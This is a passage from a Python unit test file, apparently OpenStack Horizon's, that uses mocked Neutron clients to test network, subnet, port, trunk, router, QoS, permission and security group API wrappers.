neutronclient.show_network.return_value = network
neutronclient.show_subnet.side_effect = neutron_exc.NotFound
ret_val = api.neutron.network_get(self.request, network_id)
self.assertIsInstance(ret_val, api.neutron.Network)
self.assertEqual(2, len(ret_val['subnets']))
self.assertNotIsInstance(ret_val['subnets'][0], api.neutron.Subnet)
self.assertIsInstance(ret_val['subnets'][0], str)
neutronclient.show_network.assert_called_once_with(network_id)
neutronclient.show_subnet.assert_called_once_with(subnet_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_create(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
form_data = {'network': {'name': 'net1',
'tenant_id': self.request.user.project_id}}
neutronclient = mock_neutronclient.return_value
neutronclient.create_network.return_value = network
ret_val = api.neutron.network_create(self.request, name='net1')
self.assertIsInstance(ret_val, api.neutron.Network)
neutronclient.create_network.assert_called_once_with(body=form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_update(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
network_id = self.api_networks.first()['id']
neutronclient = mock_neutronclient.return_value
form_data = {'network': {'name': 'net1'}}
neutronclient.update_network.return_value = network
ret_val = api.neutron.network_update(self.request, network_id,
name='net1')
self.assertIsInstance(ret_val, api.neutron.Network)
neutronclient.update_network.assert_called_once_with(network_id,
body=form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_delete(self, mock_neutronclient):
network_id = self.api_networks.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_network.return_value = None
api.neutron.network_delete(self.request, network_id)
neutronclient.delete_network.assert_called_once_with(network_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_get_network_ip_availability(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
mock_ip_availability = self.ip_availability.get()
neutronclient = mock_neutronclient.return_value
neutronclient.show_network_ip_availability.return_value = \
mock_ip_availability
ret_val = api.neutron.show_network_ip_availability(self.request,
network)
self.assertIsInstance(ret_val, dict)
neutronclient.show_network_ip_availability.assert_called_once_with(
network)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_network_ip_availability(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
mock_ip_availability = self.ip_availability.get()
neutronclient = mock_neutronclient.return_value
neutronclient.show_network_ip_availability.return_value = \
mock_ip_availability
ip_availability = api.neutron. \
show_network_ip_availability(self.request, network)
availabilities = ip_availability.get("network_ip_availability",
{})
ret_val = availabilities.get("subnet_ip_availability", [])
self.assertIsInstance(ret_val, list)
neutronclient.show_network_ip_availability.assert_called_once_with(
network)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_list(self, mock_neutronclient):
subnets = {'subnets': self.api_subnets.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_subnets.return_value = subnets
ret_val = api.neutron.subnet_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.Subnet)
neutronclient.list_subnets.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_get(self, mock_neutronclient):
subnet = {'subnet': self.api_subnets.first()}
subnet_id = self.api_subnets.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_subnet.return_value = subnet
ret_val = api.neutron.subnet_get(self.request, subnet_id)
self.assertIsInstance(ret_val, api.neutron.Subnet)
neutronclient.show_subnet.assert_called_once_with(subnet_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_create(self, mock_neutronclient):
subnet_data = self.api_subnets.first()
params = {'network_id': subnet_data['network_id'],
'tenant_id': subnet_data['tenant_id'],
'name': subnet_data['name'],
'cidr': subnet_data['cidr'],
'ip_version': subnet_data['ip_version'],
'gateway_ip': subnet_data['gateway_ip']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_subnet.return_value = {'subnet': subnet_data}
ret_val = api.neutron.subnet_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.Subnet)
neutronclient.create_subnet.assert_called_once_with(
body={'subnet': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_update(self, mock_neutronclient):
subnet_data = self.api_subnets.first()
subnet_id = subnet_data['id']
params = {'name': subnet_data['name'],
'gateway_ip': subnet_data['gateway_ip']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_subnet.return_value = {'subnet': subnet_data}
ret_val = api.neutron.subnet_update(self.request, subnet_id, **params)
self.assertIsInstance(ret_val, api.neutron.Subnet)
neutronclient.update_subnet.assert_called_once_with(
subnet_id, body={'subnet': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_delete(self, mock_neutronclient):
subnet_id = self.api_subnets.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_subnet.return_value = None
api.neutron.subnet_delete(self.request, subnet_id)
neutronclient.delete_subnet.assert_called_once_with(subnet_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_list(self, mock_neutronclient):
subnetpools = {'subnetpools': self.api_subnetpools.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_subnetpools.return_value = subnetpools
ret_val = api.neutron.subnetpool_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.SubnetPool)
neutronclient.list_subnetpools.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_get(self, mock_neutronclient):
subnetpool = {'subnetpool': self.api_subnetpools.first()}
subnetpool_id = self.api_subnetpools.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_subnetpool.return_value = subnetpool
ret_val = api.neutron.subnetpool_get(self.request, subnetpool_id)
self.assertIsInstance(ret_val, api.neutron.SubnetPool)
neutronclient.show_subnetpool.assert_called_once_with(subnetpool_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_create(self, mock_neutronclient):
subnetpool_data = self.api_subnetpools.first()
params = {'name': subnetpool_data['name'],
'prefixes': subnetpool_data['prefixes'],
'tenant_id': subnetpool_data['tenant_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_subnetpool.return_value = {'subnetpool':
subnetpool_data}
ret_val = api.neutron.subnetpool_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.SubnetPool)
neutronclient.create_subnetpool.assert_called_once_with(
body={'subnetpool': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_update(self, mock_neutronclient):
subnetpool_data = self.api_subnetpools.first()
subnetpool_id = subnetpool_data['id']
params = {'name': subnetpool_data['name'],
'prefixes': subnetpool_data['prefixes']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_subnetpool.return_value = {'subnetpool':
subnetpool_data}
ret_val = api.neutron.subnetpool_update(self.request, subnetpool_id,
**params)
self.assertIsInstance(ret_val, api.neutron.SubnetPool)
neutronclient.update_subnetpool.assert_called_once_with(
subnetpool_id, body={'subnetpool': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_delete(self, mock_neutronclient):
subnetpool_id = self.api_subnetpools.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_subnetpool.return_value = None
api.neutron.subnetpool_delete(self.request, subnetpool_id)
neutronclient.delete_subnetpool.assert_called_once_with(subnetpool_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_list(self, mock_neutronclient):
ports = {'ports': self.api_ports.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_ports.return_value = ports
ret_val = api.neutron.port_list(self.request)
for p in ret_val:
self.assertIsInstance(p, api.neutron.Port)
neutronclient.list_ports.assert_called_once_with()
@mock.patch.object(api.neutron, 'is_extension_supported')
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_list_with_trunk_types(
self, mock_neutronclient, mock_is_extension_supported):
ports = self.api_tp_ports.list()
trunks = self.api_tp_trunks.list()
# list_extensions is decorated with memoized_with_request, so
# neutronclient() is not called. We need to mock it separately.
mock_is_extension_supported.return_value = True # trunk
neutronclient = mock_neutronclient.return_value
neutronclient.list_ports.return_value = {'ports': ports}
neutronclient.list_trunks.return_value = {'trunks': trunks}
expected_parent_port_ids = set()
expected_subport_ids = set()
for trunk in trunks:
expected_parent_port_ids.add(trunk['port_id'])
expected_subport_ids |= set([p['port_id'] for p
in trunk['sub_ports']])
expected_normal_port_ids = ({p['id'] for p in ports} -
expected_parent_port_ids -
expected_subport_ids)
ret_val = api.neutron.port_list_with_trunk_types(self.request)
self.assertEqual(len(ports), len(ret_val))
parent_port_ids = {p.id for p in ret_val
if isinstance(p, api.neutron.PortTrunkParent)}
subport_ids = {p.id for p in ret_val
if isinstance(p, api.neutron.PortTrunkSubport)}
normal_port_ids = ({p.id for p in ret_val} -
parent_port_ids - subport_ids)
self.assertEqual(expected_parent_port_ids, parent_port_ids)
self.assertEqual(expected_subport_ids, subport_ids)
self.assertEqual(expected_normal_port_ids, normal_port_ids)
mock_is_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'trunk')
neutronclient.list_ports.assert_called_once_with()
neutronclient.list_trunks.assert_called_once_with()
@mock.patch.object(api.neutron, 'is_extension_supported')
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_list_with_trunk_types_without_trunk_extension(
self, mock_neutronclient, mock_is_extension_supported):
ports = self.api_tp_ports.list()
# list_extensions is decorated with memoized_with_request,
# the simpliest way is to mock it directly.
mock_is_extension_supported.return_value = False # trunk
neutronclient = mock_neutronclient.return_value
neutronclient.list_ports.return_value = {'ports': ports}
ret_val = api.neutron.port_list_with_trunk_types(self.request)
self.assertEqual(len(ports), len(ret_val))
self.assertEqual(set(p['id'] for p in ports),
set(p.id for p in ret_val))
# When trunk extension is disabled, all returned values should be
# instances of Port class.
self.assertTrue(all(isinstance(p, api.neutron.Port) for p in ret_val))
mock_is_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'trunk')
neutronclient.list_ports.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_get(self, mock_neutronclient):
port = {'port': self.api_ports.first()}
port_id = self.api_ports.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_port.return_value = port
ret_val = api.neutron.port_get(self.request, port_id)
self.assertIsInstance(ret_val, api.neutron.Port)
neutronclient.show_port.assert_called_once_with(port_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_create(self, mock_neutronclient):
port = {'port': self.api_ports.first()}
params = {'network_id': port['port']['network_id'],
'tenant_id': port['port']['tenant_id'],
'name': port['port']['name'],
'device_id': port['port']['device_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_port.return_value = port
ret_val = api.neutron.port_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.Port)
self.assertEqual(api.neutron.Port(port['port']).id, ret_val.id)
neutronclient.create_port.assert_called_once_with(
body={'port': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_update(self, mock_neutronclient):
port_data = self.api_ports.first()
port_id = port_data['id']
params = {'name': port_data['name'],
'device_id': port_data['device_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_port.return_value = {'port': port_data}
ret_val = api.neutron.port_update(self.request, port_id, **params)
self.assertIsInstance(ret_val, api.neutron.Port)
self.assertEqual(api.neutron.Port(port_data).id, ret_val.id)
neutronclient.update_port.assert_called_once_with(
port_id, body={'port': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_delete(self, mock_neutronclient):
port_id = self.api_ports.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_port.return_value = None
api.neutron.port_delete(self.request, port_id)
neutronclient.delete_port.assert_called_once_with(port_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_list(self, mock_neutronclient):
trunks = {'trunks': self.api_trunks.list()}
neutron_client = mock_neutronclient.return_value
neutron_client.list_trunks.return_value = trunks
ret_val = api.neutron.trunk_list(self.request)
for t in ret_val:
self.assertIsInstance(t, api.neutron.Trunk)
neutron_client.list_trunks.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_show(self, mock_neutronclient):
trunk = {'trunk': self.api_trunks.first()}
trunk_id = self.api_trunks.first()['id']
neutron_client = mock_neutronclient.return_value
neutron_client.show_trunk.return_value = trunk
ret_val = api.neutron.trunk_show(self.request, trunk_id)
self.assertIsInstance(ret_val, api.neutron.Trunk)
neutron_client.show_trunk.assert_called_once_with(trunk_id)
def test_trunk_object(self):
trunk = self.api_trunks.first().copy()
obj = api.neutron.Trunk(trunk)
self.assertEqual(0, obj.subport_count)
trunk_dict = obj.to_dict()
self.assertIsInstance(trunk_dict, dict)
self.assertEqual(trunk['name'], trunk_dict['name_or_id'])
self.assertEqual(0, trunk_dict['subport_count'])
trunk['name'] = '' # to test name_or_id
trunk['sub_ports'] = [uuidutils.generate_uuid() for i in range(2)]
obj = api.neutron.Trunk(trunk)
self.assertEqual(2, obj.subport_count)
trunk_dict = obj.to_dict()
self.assertEqual(obj.name_or_id, trunk_dict['name_or_id'])
self.assertEqual(2, trunk_dict['subport_count'])
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_create(self, mock_neutronclient):
trunk = {'trunk': self.api_trunks.first()}
params = {'name': trunk['trunk']['name'],
'port_id': trunk['trunk']['port_id'],
'project_id': trunk['trunk']['project_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_trunk.return_value = trunk
ret_val = api.neutron.trunk_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk['trunk']).id, ret_val.id)
neutronclient.create_trunk.assert_called_once_with(
body={'trunk': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_delete(self, mock_neutronclient):
trunk_id = self.api_trunks.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_trunk.return_value = None
api.neutron.trunk_delete(self.request, trunk_id)
neutronclient.delete_trunk.assert_called_once_with(trunk_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_update_details(self, mock_neutronclient):
trunk_data = self.api_trunks.first()
trunk_id = trunk_data['id']
old_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'admin_state_up': trunk_data['admin_state_up']}
new_trunk = {'name': 'foo',
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'admin_state_up': trunk_data['admin_state_up']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_trunk.return_value = {'trunk': new_trunk}
ret_val = api.neutron.trunk_update(self.request, trunk_id,
old_trunk, new_trunk)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk_data).id, ret_val.id)
self.assertEqual(ret_val.name, new_trunk['name'])
neutronclient.update_trunk.assert_called_once_with(
trunk_id, body={'trunk': {'name': 'foo'}})
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_update_add_subports(self, mock_neutronclient):
trunk_data = self.api_trunks.first()
trunk_id = trunk_data['id']
old_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': trunk_data['sub_ports'],
'admin_state_up': trunk_data['admin_state_up']}
new_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': [
{'port_id': 1,
'segmentation_id': 100,
'segmentation_type': 'vlan'}],
'admin_state_up': trunk_data['admin_state_up']}
neutronclient = mock_neutronclient.return_value
neutronclient.trunk_add_subports.return_value = {'trunk': new_trunk}
ret_val = api.neutron.trunk_update(self.request, trunk_id,
old_trunk, new_trunk)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk_data).id, ret_val.trunk['id'])
self.assertEqual(ret_val.trunk['sub_ports'], new_trunk['sub_ports'])
neutronclient.trunk_add_subports.assert_called_once_with(
trunk_id,
body={'sub_ports': [{'port_id': 1, 'segmentation_id': 100,
'segmentation_type': 'vlan'}]}
)
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_update_remove_subports(self, mock_neutronclient):
trunk_data = self.api_trunks.first()
trunk_id = trunk_data['id']
old_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': [
{'port_id': 1,
'segmentation_id': 100,
'segmentation_type': 'vlan'}],
'admin_state_up': trunk_data['admin_state_up']}
new_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': [],
'admin_state_up': trunk_data['admin_state_up']}
neutronclient = mock_neutronclient.return_value
neutronclient.trunk_remove_subports.return_value = {'trunk': new_trunk}
ret_val = api.neutron.trunk_update(self.request, trunk_id,
old_trunk, new_trunk)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk_data).id, ret_val.trunk['id'])
self.assertEqual(ret_val.trunk['sub_ports'], new_trunk['sub_ports'])
neutronclient.trunk_remove_subports.assert_called_once_with(
trunk_id,
body={'sub_ports': [{'port_id':
old_trunk['sub_ports'][0]['port_id']}]}
)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_list(self, mock_neutronclient):
routers = {'routers': self.api_routers.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_routers.return_value = routers
ret_val = api.neutron.router_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.Router)
neutronclient.list_routers.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_get(self, mock_neutronclient):
router = {'router': self.api_routers.first()}
router_id = self.api_routers.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
ret_val = api.neutron.router_get(self.request, router_id)
self.assertIsInstance(ret_val, api.neutron.Router)
neutronclient.show_router.assert_called_once_with(router_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_create(self, mock_neutronclient):
router = {'router': self.api_routers.first()}
neutronclient = mock_neutronclient.return_value
form_data = {'router': {'name': 'router1',
'tenant_id': self.request.user.project_id}}
neutronclient.create_router.return_value = router
ret_val = api.neutron.router_create(self.request, name='router1')
self.assertIsInstance(ret_val, api.neutron.Router)
neutronclient.create_router.assert_called_once_with(body=form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_delete(self, mock_neutronclient):
router_id = self.api_routers.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_router.return_value = None
api.neutron.router_delete(self.request, router_id)
neutronclient.delete_router.assert_called_once_with(router_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_add_interface(self, mock_neutronclient):
subnet_id = self.api_subnets.first()['id']
router_id = self.api_routers.first()['id']
neutronclient = mock_neutronclient.return_value
form_data = {'subnet_id': subnet_id}
neutronclient.add_interface_router.return_value = None
api.neutron.router_add_interface(
self.request, router_id, subnet_id=subnet_id)
neutronclient.add_interface_router.assert_called_once_with(router_id,
form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_remove_interface(self, mock_neutronclient):
router_id = self.api_routers.first()['id']
fake_port = self.api_ports.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.remove_interface_router.return_value = None
api.neutron.router_remove_interface(
self.request, router_id, port_id=fake_port)
neutronclient.remove_interface_router.assert_called_once_with(
router_id, {'port_id': fake_port})
# Mocking neutronclient() does not work because api.neutron.list_extensions
# is decorated with memoized_with_request, so we need to mock
# neutronclient.v2_0.client directly.
@mock.patch('neutronclient.v2_0.client.Client.list_extensions')
def test_is_extension_supported(self, mock_list_extensions):
extensions = self.api_extensions.list()
mock_list_extensions.return_value = {'extensions': extensions}
self.assertTrue(
api.neutron.is_extension_supported(self.request, 'quotas'))
self.assertFalse(
api.neutron.is_extension_supported(self.request, 'doesntexist'))
mock_list_extensions.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_static_route_list(self, mock_neutronclient):
router = {'router': self.api_routers_with_routes.first()}
router_id = self.api_routers_with_routes.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
ret_val = api.neutron.router_static_route_list(self.request, router_id)
self.assertIsInstance(ret_val[0], api.neutron.RouterStaticRoute)
neutronclient.show_router.assert_called_once_with(router_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_static_route_remove(self, mock_neutronclient):
router = {'router': self.api_routers_with_routes.first()}
router_id = self.api_routers_with_routes.first()['id']
post_router = copy.deepcopy(router)
route = api.neutron.RouterStaticRoute(post_router['router']
['routes'].pop())
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
neutronclient.update_router.return_value = post_router
api.neutron.router_static_route_remove(self.request,
router_id, route.id)
neutronclient.show_router.assert_called_once_with(router_id)
body = {'router': {'routes': post_router['router']['routes']}}
neutronclient.update_router.assert_called_once_with(
router_id, body=body)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_static_route_add(self, mock_neutronclient):
router = {'router': self.api_routers_with_routes.first()}
router_id = self.api_routers_with_routes.first()['id']
post_router = copy.deepcopy(router)
route = {'nexthop': '10.0.0.5', 'destination': '40.0.1.0/24'}
post_router['router']['routes'].insert(0, route)
body = {'router': {'routes': post_router['router']['routes']}}
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
neutronclient.update_router.return_value = post_router
api.neutron.router_static_route_add(self.request, router_id, route)
neutronclient.show_router.assert_called_once_with(router_id)
neutronclient.update_router.assert_called_once_with(router_id,
body=body)
# NOTE(amotoki): "dvr" permission tests check most of
# get_feature_permission features.
# These tests are not specific to "dvr" extension.
# Please be careful if you drop "dvr" extension in future.
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
True},
POLICY_CHECK_FUNCTION=None)
@test.create_mocks({api.neutron: ('is_extension_supported',)})
def _test_get_dvr_permission_dvr_supported(self, dvr_enabled):
self.mock_is_extension_supported.return_value = dvr_enabled
self.assertEqual(dvr_enabled,
api.neutron.get_feature_permission(self.request,
'dvr', 'get'))
self.mock_is_extension_supported.assert_called_once_with(
self.request, 'dvr')
def test_get_dvr_permission_dvr_supported(self):
self._test_get_dvr_permission_dvr_supported(dvr_enabled=True)
def test_get_dvr_permission_dvr_not_supported(self):
self._test_get_dvr_permission_dvr_supported(dvr_enabled=False)
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
True},
POLICY_CHECK_FUNCTION='openstack_auth.policy.check')
@test.create_mocks({api.neutron: ('is_extension_supported',),
policy: ('check',)})
def _test_get_dvr_permission_with_policy_check(self, policy_check_allowed,
operation):
if operation == "create":
role = (("network", "create_router:distributed"),)
elif operation == "get":
role = (("network", "get_router:distributed"),)
self.mock_check.return_value = policy_check_allowed
self.mock_is_extension_supported.return_value = policy_check_allowed
self.assertEqual(policy_check_allowed,
api.neutron.get_feature_permission(self.request,
'dvr', operation))
self.mock_check.assert_called_once_with(role, self.request)
if policy_check_allowed:
self.mock_is_extension_supported.assert_called_once_with(
self.request, 'dvr')
else:
self.mock_is_extension_supported.assert_not_called()
def test_get_dvr_permission_with_policy_check_allowed(self):
self._test_get_dvr_permission_with_policy_check(True, "get")
def test_get_dvr_permission_with_policy_check_disallowed(self):
self._test_get_dvr_permission_with_policy_check(False, "get")
def test_get_dvr_permission_create_with_policy_check_allowed(self):
self._test_get_dvr_permission_with_policy_check(True, "create")
def test_get_dvr_permission_create_with_policy_check_disallowed(self):
self._test_get_dvr_permission_with_policy_check(False, "create")
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
False})
def test_get_dvr_permission_dvr_disabled_by_config(self):
self.assertFalse(api.neutron.get_feature_permission(self.request,
'dvr', 'get'))
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
True},
POLICY_CHECK_FUNCTION='openstack_auth.policy.check')
def test_get_dvr_permission_dvr_unsupported_operation(self):
self.assertRaises(ValueError,
api.neutron.get_feature_permission,
self.request, 'dvr', 'unSupported')
@override_settings(OPENSTACK_NEUTRON_NETWORK={})
def test_get_dvr_permission_dvr_default_config(self):
self.assertFalse(api.neutron.get_feature_permission(self.request,
'dvr', 'get'))
@override_settings(OPENSTACK_NEUTRON_NETWORK={})
def test_get_dvr_permission_router_ha_default_config(self):
self.assertFalse(api.neutron.get_feature_permission(self.request,
'l3-ha', 'get'))
# NOTE(amotoki): Most of get_feature_permission are checked by "dvr" check
# above. l3-ha check only checks l3-ha specific code.
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_ha_router': True},
POLICY_CHECK_FUNCTION='openstack_auth.policy.check')
@test.create_mocks({api.neutron: ('is_extension_supported',),
policy: ('check',)})
def _test_get_router_ha_permission_with_policy_check(self, ha_enabled):
role = (("network", "create_router:ha"),)
self.mock_check.return_value = True
self.mock_is_extension_supported.return_value = ha_enabled
self.assertEqual(ha_enabled,
api.neutron.get_feature_permission(self.request,
'l3-ha', 'create'))
self.mock_check.assert_called_once_with(role, self.request)
self.mock_is_extension_supported.assert_called_once_with(self.request,
'l3-ha')
def test_get_router_ha_permission_with_l3_ha_extension(self):
self._test_get_router_ha_permission_with_policy_check(True)
def test_get_router_ha_permission_without_l3_ha_extension(self):
self._test_get_router_ha_permission_with_policy_check(False)
@mock.patch.object(api.neutron, 'neutronclient')
def test_list_resources_with_long_filters(self, mock_neutronclient):
# In this tests, port_list is called with id=[10 port ID]
# filter. It generates about 40*10 char length URI.
# Each port ID is converted to "id=<UUID>&" in URI and
# it means 40 chars (len(UUID)=36).
# If excess length is 220, it means 400-220=180 chars
# can be sent in the first request.
# As a result three API calls with 4, 4, 2 port ID
# are expected.
ports = [{'id': uuidutils.generate_uuid(),
'name': 'port%s' % i,
'admin_state_up': True}
for i in range(10)]
port_ids = tuple([port['id'] for port in ports])
neutronclient = mock_neutronclient.return_value
uri_len_exc = neutron_exc.RequestURITooLong(excess=220)
list_ports_retval = [uri_len_exc]
for i in range(0, 10, 4):
list_ports_retval.append({'ports': ports[i:i + 4]})
neutronclient.list_ports.side_effect = list_ports_retval
ret_val = api.neutron.list_resources_with_long_filters(
api.neutron.port_list, 'id', tuple(port_ids),
request=self.request)
self.assertEqual(10, len(ret_val))
self.assertEqual(port_ids, tuple([p.id for p in ret_val]))
expected_calls = []
expected_calls.append(mock.call(id=tuple(port_ids)))
for i in range(0, 10, 4):
expected_calls.append(mock.call(id=tuple(port_ids[i:i + 4])))
neutronclient.list_ports.assert_has_calls(expected_calls)
@mock.patch.object(api.neutron, 'neutronclient')
def test_qos_policies_list(self, mock_neutronclient):
exp_policies = self.qos_policies.list()
api_qos_policies = {'policies': self.api_qos_policies.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_qos_policies.return_value = api_qos_policies
ret_val = api.neutron.policy_list(self.request)
self.assertEqual(len(ret_val), len(exp_policies))
self.assertIsInstance(ret_val[0], api.neutron.QoSPolicy)
self.assertEqual(exp_policies[0].name, ret_val[0].name)
neutronclient.list_qos_policies.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_qos_policy_create(self, mock_neutronclient):
qos_policy = self.api_qos_policies.first()
post_data = {'policy': {'name': qos_policy['name']}}
neutronclient = mock_neutronclient.return_value
neutronclient.create_qos_policy.return_value = {'policy': qos_policy}
ret_val = api.neutron.policy_create(self.request,
name=qos_policy['name'])
self.assertIsInstance(ret_val, api.neutron.QoSPolicy)
self.assertEqual(qos_policy['name'], ret_val.name)
neutronclient.create_qos_policy.assert_called_once_with(body=post_data)
class NeutronApiSecurityGroupTests(test.APIMockTestCase):
def setUp(self):
super(NeutronApiSecurityGroupTests, self).setUp()
neutronclient = mock.patch.object(api.neutron, 'neutronclient').start()
self.qclient = neutronclient.return_value
self.sg_dict = dict([(sg['id'], sg['name']) for sg
in self.api_security_groups.list()])
def _cmp_sg_rule(self, exprule, retrule):
self.assertEqual(exprule['id'], retrule.id)
self.assertEqual(exprule['security_group_id'],
retrule.parent_group_id)
self.assertEqual(exprule['direction'],
retrule.direction)
self.assertEqual(exprule['ethertype'],
retrule.ethertype)
self.assertEqual(exprule['port_range_min'],
retrule.from_port)
self.assertEqual(exprule['port_range_max'],
retrule.to_port,)
if (exprule['remote_ip_prefix'] is None and
exprule['remote_group_id'] is None):
expcidr = ('::/0' if exprule['ethertype'] == 'IPv6'
else '0.0.0.0/0')
else:
expcidr = exprule['remote_ip_prefix']
self.assertEqual(expcidr, retrule.ip_range.get('cidr'))
self.assertEqual(self.sg_dict.get(exprule['remote_group_id']),
retrule.group.get('name'))
def _cmp_sg(self, exp_sg, ret_sg):
self.assertEqual(exp_sg['id'], ret_sg.id)
self.assertEqual(exp_sg['name'], ret_sg.name)
exp_rules = exp_sg['security_group_rules']
self.assertEqual(len(exp_rules), len(ret_sg.rules))
for (exprule, retrule) in six.moves.zip(exp_rules, ret_sg.rules):
self._cmp_sg_rule(exprule, retrule)
def _test_security_group_list(self, **params):
sgs = self.api_security_groups.list()
q_params = {'tenant_id': self.request.user.tenant_id}
# if tenant_id is specified, the passed tenant_id should be sent.
q_params.update(params)
# use deepcopy to ensure self.api_security_groups is not modified.
self.qclient.list_security_groups.return_value = {'security_groups':
copy.deepcopy(sgs)}
rets = api.neutron.security_group_list(self.request, **params)
self.assertEqual(len(sgs), len(rets))
for (exp, ret) in six.moves.zip(sgs, rets):
self._cmp_sg(exp, ret)
self.qclient.list_security_groups.assert_called_once_with(**q_params)
def test_security_group_list(self):
self._test_security_group_list()
def test_security_group_list_with_params(self):
self._test_security_group_list(name='sg1')
def test_security_group_list_with_tenant_id(self):
self._test_security_group_list(tenant_id='tenant1', name='sg1')
def test_security_group_get(self):
secgroup = self.api_security_groups.first()
sg_ids = set([secgroup['id']] +
[rule['remote_group_id'] for rule
in secgroup['security_group_rules']
if rule['remote_group_id']])
related_sgs = [sg for sg in self.api_security_groups.list()
if sg['id'] in sg_ids]
